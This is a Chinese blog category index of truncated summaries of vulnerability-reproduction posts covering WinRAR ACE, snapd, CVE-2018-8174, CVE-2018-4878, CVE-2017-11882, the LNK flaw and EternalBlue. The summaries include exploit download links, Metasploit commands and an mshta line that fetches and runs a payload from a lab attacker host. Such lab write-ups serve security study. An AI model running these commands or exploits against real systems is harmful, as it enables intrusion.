随笔分类 - 漏洞复现
摘要:影响版本: WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170 测试版本:WinRAR 5.61 工具地址:https://github.com/droe/acefile
阅读全文
摘要:漏洞描述: Ubuntu 版本: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS 2.28 < snapd < 2.37 会存在该漏洞 Poc Github:https://github.com/initstring/d
阅读全文
摘要:影响的 Windows 版本: Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based SystemsMicrosoft Windows 10 Versio
阅读全文
摘要:项目地址:https://github.com/SandboxEscaper/randomrepo 相关工具的下载地址: Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
阅读全文
摘要:漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.
阅读全文
摘要:该漏洞在老版本中被修复了,但新的版本还存在漏洞 影响范围:Linux Kernel Version 4.14-4.4,Ubuntu/Debian发行版本 Exp下载地址:http://cyseclabs.com/exploits/upstream44.c 测试环境 sch01ar@ubuntu:~$
阅读全文
摘要:项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 影响版本为:Adobe Flash Player <= 28.0.0.137 攻击机器IP:192.168.220.152 目标靶机:192.168.220.151,浏览器为360浏览器 用msfve
阅读全文
摘要:项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshta http://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[root@sch01ar]─[/sch01ar/
阅读全文
摘要:开启msf root@sch01ar:~# msfconsole 设置模块 msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 设置payload msf exploit(cve_2017_8464_lnk_rce) > set pa
阅读全文
摘要:目标主机:192.168.220.148,系统为Microsoft Windows Server 2008 R2 Datacenter,开启了445端口 开启msf root@sch01ar:~# msfconsole 搜索一下模块 msf > search Eternalblue 选择第二个 ms
阅读全文